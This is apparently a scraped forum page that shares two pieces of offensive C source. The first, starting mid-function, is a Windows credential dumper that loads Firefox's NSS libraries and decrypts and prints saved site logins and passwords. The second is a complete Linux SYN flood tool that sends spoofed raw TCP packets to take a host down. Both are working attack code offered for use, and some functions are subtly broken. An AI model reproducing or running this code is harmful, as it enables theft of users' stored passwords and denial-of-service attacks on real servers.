) { libnss=LoadLibrary(FFDir, NSS_LIBRARY_NAME); if(libnss ) printf("\n\n Librarys loaded from master firefox path successfully"); } } } } } } // Now load from current path. if( !libnss ) { libnss =LOADLIBRARY(NSS_LIBRARY_NAME); libplc =LOADLIBRARY(PLC_LIBRARY_NAME); if( !libnss || !libplc ) { printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME); return 0; } } else { printf("\n Firefox Libraries loaded successfully"); } // Extract the required functions.... NSSInit = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init"); NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown"); PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot"); PK11FreeSlot = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot"); PK11Authenticate = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate"); PK11SDRDecrypt = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt"); PK11CheckUserPassword = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword"); if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword) { printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME); NSSUnload(); return 0; } // Get the functions from PLC library PLBase64Decode = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode"); if( !PLBase64Decode ) { printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME); NSSUnload(); return 0; } else { printf("\n Firefox library initialized successfully"); } return 1; } //----------------------------------------------------------------------- int InitializeNSSLibrary(char *profilePath) { IsNSSInitialized = 0; // Initialize the NSS library if( (*NSSInit) (profilePath) != SECSuccess ) { printf("\n\n NSSLib Initialization failed"); NSSUnload(); return 0; } else { IsNSSInitialized = 1; printf("\n NSS library initiliazed successfully"); } return 1; } //----------------------------------------------------------------------- void NSSUnload() { if( IsNSSInitialized && (NSSShutdown != NULL) ) (*NSSShutdown)(); if( libnss != NULL ) FREELIBRARY(libnss); //Free nss library if( libplc != NULL ) FREELIBRARY(libplc); //Free plc library } //----------------------------------------------------------------------- int DecryptStr(char *cryptData, char **clearData) { int decodeLen = 0; int finalLen = 0; char *decodeData = NULL; char *finalData = NULL; if( cryptData[0] != NULL ) { if( (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) ) { return 0; } // Do the actual PK11 decryption if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL)) { return 0; } *clearData = (char*) malloc( finalLen + 1 ); if( *clearData == NULL ) { printf("\n Insufficient memory"); return 0; } memcpy(*clearData, finalData, finalLen); *(*clearData + finalLen) = 0; // Null terminate string return 1; } if( Base64Decode(cryptData, clearData, &decodeLen) == 0 ) { return 0; } return 1; } //----------------------------------------------------------------------- int Base64Decode(char *cryptData, char **decodeData, int *decodeLen) { int len = strlen( cryptData ); int adjust = 0; if (cryptData[len-1] == '=') { adjust++; if (cryptData[len-2] == '=') adjust++; } *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL); if( *decodeData == NULL ) { return 0; } *decodeLen = (len*3)/4 - adjust; return 1; } //----------------------------------------------------------------------- int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen) { PK11SlotInfo *slot = 0; SECStatus status; SECItem request; SECItem reply; // Find token with SDR key slot = (*PK11GetInternalKeySlot)(); if (!slot) { return 0; } // Decrypt the string request.data = (unsigned char *)decodeData; request.len = decodeLen; reply.data = 0; reply.len = 0; status = (*PK11SDRDecrypt)(&request, &reply, NULL); if (status != SECSuccess) { return 0; } *clearData = (char*)reply.data; *finalLen = reply.len; // Free the slot (*PK11FreeSlot)(slot); return 1; } //----------------------------------------------------------------------- int DumpCache(char *profilePath,char *signonFile) { char buffer[10240]; char sbuffer[10240]; char name[10240]; char *clearData = NULL; int bufferLength = 10240; int count = 0; int ret; if( profilePath == NULL || signonFile == NULL) { return 0; } strcpy(sbuffer,profilePath); strcat(sbuffer,"\\"); strcat(sbuffer,signonFile); if(OpenFile(sbuffer) == 0 ) // Open the signon file { printf("\n\n Failed to open signon file: [%s], skipped. ", signonFile); return 0; } else { printf("\n\n ============================================================== "); printf("\n = %s = ",signonFile); printf("\n ============================================================== "); /*///////////////////////////////////////// Begin cache dump *////////////////////////////////////////// printf("\n\n ======================= Unmanaged URLS ======================= "); // Read out the unmanaged ("Never remember" URL list ReadLine(buffer, bufferLength); //Skip first line as its a useless version tag while (ReadLine(buffer, bufferLength) != 0) { // End of unmanaged list if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#') break; printf("\n %s ", buffer); } printf("\n ======================== Managed URLS ========================\n"); // read the URL line while (ReadLine(buffer, bufferLength) != 0 ){ printf("\n URL: %s ", buffer); //Start looping through final singon*.txt file while (ReadLine(buffer, bufferLength) != 0 ) { if (buffer[0] == '.') { printf("\n ==============================================================\n"); break; // end of cache entry } //Check if its a password if (buffer[0] == '*') { strcpy(name,&buffer[1]); ret = ReadLine(buffer, bufferLength); } else { printf("\n"); strcpy(name, buffer); ret = ReadLine(buffer, bufferLength); } if( DecryptStr(buffer, &clearData) == 1 ) { printf("\n %s: %s ", name, clearData); clearData = NULL; } } } printf("\n\n ============================================================== "); printf("\n = END %s = ",signonFile); printf("\n ============================================================== \n"); return 1; } /*///////////////////////////////////////// End pcache dump *////////////////////////////////////////// } //----------------------------------------------------------------------- // Find firefox path / libraries char *GetFFLibPath() { char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command"; char path[_MAX_PATH] =""; char *FFDir = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path if( RegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox path value from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || path[0] == 0) { printf("\n Unable to locate firefox installation path"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); // Remove extra quotes if( path[0] == '\"' ) { for(int i=0; i < strlen(path)-1 ; i++) path[i] = path[i+1]; } printf("\n Firefox main exe: %s", path); // Terminate the string at last "\\" for(int j=strlen(path)-1; j>0; j--) { if( path[j] == '\\' ) { path[j]=0; break; } } FFDir = (char*) malloc( strlen(path) + 1); if(FFDir) strcpy(FFDir, path); printf("\n Firefox path: %s", FFDir); return FFDir; } //----------------------------------------------------------------------- char *GetFFProfilePath() { char profilePath[_MAX_PATH] = ""; char partialPath[] = "Application Data\\Mozilla\\Firefox"; char profileFile[_MAX_PATH]; char line[1024]; DWORD pathSize = _MAX_PATH; char *finalProfilePath = NULL; int isDefaultFound = 0; HANDLE token; // Get current user's profile directory if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE ) { printf("\n Failed to get current process token "); return NULL; } if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE ) { printf("\n Failed to get user profile directory"); return NULL; } printf("\n User Profile directory: %s\n", profilePath); // Get firefox profile directory strcpy(profileFile, profilePath); strcat(profileFile,"\\"); strcat(profileFile,partialPath); strcat(profileFile,"\\profiles.ini"); // Open the firefox profile setting file FILE *profile = fopen(profileFile, "r"); if( profile == NULL ) { printf("\n Unable to find firefox profile file: %s ", profileFile); return NULL; } // This indicates that we are looking under default profile while(fgets(line, 1024, profile)) { StrLwr(line); if( !isDefaultFound && ( strstr(line, "name=default") != NULL) ) { isDefaultFound = 1; continue; } // Found default profile / check for path if( isDefaultFound ) { if( strstr(line,"path=") != NULL) { char *slash = strstr(line,"/"); if( slash != NULL ) *slash = '\\'; // remove \n from the end of line line[strlen(line)-1] = 0; char *start = strstr(line,"="); int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ; finalProfilePath = (char *) malloc(totalLen); if( finalProfilePath ) { strcpy(finalProfilePath,profilePath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,partialPath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,start+1); printf("\n Final profile path: %s \n", finalProfilePath); } break; } } } fclose(profile); return finalProfilePath; } //----------------------------------------------------------------------- char *GetFFVersion() { char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox"; char *FFVers = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path value if( RegQueryValueEx(rkey, "CurrentVersion", 0, &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox version from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || Vers[0] == 0) { printf("\n Path value read from the registry is empty"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); FFVers = (char*) malloc( strlen(Vers) + 1); if( FFVers ) strcpy(Vers,FFVers); if (FFVers[1] == '1') { version = 1; }else{ if (FFVers[1] == '2') { version = 2; }else{ if (FFVers[1] == '3') { version = 3; } } } printf("\n Firefox version: %d", version); return (FFVers); } //----------------------------------------------------------------------- int main(int argc, char* argv[]) { char *ProfilePath = NULL; //Profile path char *FFDir = NULL; //Firefox main installation path char buff[1024]; ProfilePath = GetFFProfilePath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox profile directory does not exist or no profiles found. \n"); return 0; } FFDir = GetFFLibPath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox installation path does not exist or is not installed. \n"); return 0; } if( InitFFLibs(FFDir) ) { if( InitializeNSSLibrary(ProfilePath) ) { //Take 3 Mozilla dumps DumpCache(ProfilePath,"signons.txt"); DumpCache(ProfilePath,"signons2.txt"); DumpCache(ProfilePath,"signons3.txt"); //DumpCache(ProfilePath,"signons.sqlite"); //Dont forget to flush :/ NSSUnload(); } } printf("\n ======================= End Cache Dump =======================\n"); while(1){ Sleep(10000); //Just loop until user exits } } //----------------------------------------------------------------------- Sursa: LeetCoders
  25. Nytro
    [GNU Linux C] SYN Flooder source Author: jakash3 (cred) C source code for Linux for sending multiple SYN flagged tcp/ip packets with spoofed source addresses to spawn half-open fake connections with tcp hosts. A form of DoS attack using ipv4 addressing that may still work against hosts without syn cookies enabled. Using raw tcp ipv4 sockets, it sends packets in the form of an IP header and an appended TCP header with no initial data. Checksum for IP header is calculated for the IP header only, while checksum for TCP header is calculated for the TCP pseudo-header concatenated with the actual TCP header and data. synflood.c #include "tcpip.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <signal.h> #include <errno.h> ushort csum(short* data, int len); char* randip(char* dst); ushort rand16(); uint rand32(); int sd; void help() { printf("SYN flooder - by Jakash3\nArguments: IPV4_ADDR PORT\n"); exit(1); } void quit(int sig) { close(sd); exit(0); } int main(int argc, char** argv) { if (argc!=3) help(); /* Map CTRL-C to quit() */ struct sigaction sa; sa.sa_handler = &quit; sa.sa_flags = 0; sigemptyset(&sa.sa_mask); sigaction(SIGINT, &sa, 0); char rip[16]; char packet[4096]; struct iphdr ip; struct tcpph tph; struct tcphdr tcp; struct sockaddr_in sin; const int on = 1; memset(&packet, 0, 40); ip.ihl = 5; ip.ipv = 4; ip.tos = 0; ip.len = IPHDR_LEN + TCPHDR_LEN; ip.id = htons(rand16()); ip.ttl = 64; ip.proto = IPPROTO_TCP; ip.src = (uint)inet_addr(randip(rip)); ip.dst = (uint)inet_addr(argv[1]); ip.chksum = 0; ip.chksum = csum((short*)&ip, IPHDR_LEN); tcp.sport = htons((short)atoi(argv[2])); tcp.dport = htons((short)atoi(argv[2])); tcp.seq = htonl(rand32()); tcp.offset = sizeof(struct tcphdr) / 4; tcp.flgs = TCP_SYN; tcp.chksum = 0; tph.src = ip.src; tph.dst = ip.dst; tph.zero = 0; tph.proto = IPPROTO_TCP; tph.tcp_len = sizeof(struct tcphdr); memmove(packet, &tph, TCPPH_LEN); memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN); tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN); memmove(packet, &ip, IPHDR_LEN); memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN); sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if (sd == -1) { printf("Failed to create socket. Error code: %d\n", errno); exit(1); } if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) { printf("Failed to set socket options. Error code: %d\n", errno); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(tcp.dport); memmove(&(sin.sin_addr), &(ip.dst), sizeof(struct in_addr)); while (1) { if (sendto(sd, packet, ip.len, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) { printf("Failed to send SYN packet(s). Error code: %d\n", errno); exit(1); } else { printf("Sent SYN packet with spoofed ip: %s\n", rip); } ip.id = htons(rand16()); ip.src = (uint)inet_addr(randip(rip)); ip.chksum = 0; ip.chksum = csum((short*)&ip, IPHDR_LEN); tph.src = ip.src; tcp.seq = htonl(rand32()); tcp.chksum = 0; memmove(packet, &tph, TCPPH_LEN); memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN); tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN); memmove(packet, &ip, IPHDR_LEN); memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN); } } ushort csum(short* data, int len) { int sum = 0; for (; len > 1; len -= 2) sum += *data++; if (len == 1) sum += *(uchar*)data; while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16); return ~sum; } /* The best I can do for generating a random ipv4 address */ char* randip(char* dst) { dst[0] = 0; int i, j, k; srandom(time(0)); srand(random()); srandom(rand()); j = rand() + random(); for (i = 0, k = 0; k < 4; i += strlen(dst + i), k++, j += ((rand() + (int)dst) % i) ^ time(0)) { srand((int)dst + i + k); srand(j + dst[i+k] + (int)&i + rand()); j = rand() % 255; sprintf(dst + i, "%d.", j); } dst[i-1] = 0; return dst; } ushort rand16() { srandom(time(0)); srand(random()); srandom(rand()); return (random() + rand() + time(0)) % 65535; } uint rand32() { srandom(time(0)); srand(random()); srandom(rand()); return (random() + rand() & time(0)); } tcpip.h #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netdb.h> typedef unsigned char uchar; typedef unsigned short ushort; typedef unsigned int uint; /* Internet Datagram Header */ #define IPHDR_LEN 20 struct iphdr { uchar ipv:4; /* Internet Protocol Version */ uchar ihl:4; /* Total length (in DWORDs) */ uchar tos; /* Type of Service */ ushort len; /* Total length */ ushort id; /* Identification number */ ushort frag; /* Fragment offset and flags */ uchar ttl; /* Time to live */ uchar proto; /* Protocol type */ ushort chksum; /* Checksum */ uint src; /* Source IP Address */ uint dst; /* Destination IP Address */ }; /* TCP Header */ #define TCPHDR_LEN 20 struct tcphdr { ushort sport; /* Source Port */ ushort dport; /* Destination Port */ uint seq; /* Sequence number */ uint ack; /* Acknowledgement number */ uchar reserved:4; uchar offset:4; /* Size of TCP Header in DWORDs */ uchar flgs; /* TCP Flags */ #define TCP_FIN 0x01 #define TCP_SYN 0x02 #define TCP_RST 0x04 #define TCP_PSH 0x08 #define TCP_ACK 0x10 #define TCP_URG 0x20 ushort win; /* Window. Size of data to accept */ ushort chksum; /* Checksum */ ushort urgp; /* idk */ }; /* TCP Psuedo-header */ #define TCPPH_LEN 12 struct tcpph { uint src; uint dst; uchar zero; uchar proto; ushort tcp_len; }; Sursa: LeetCoders
×
×
  • Create New...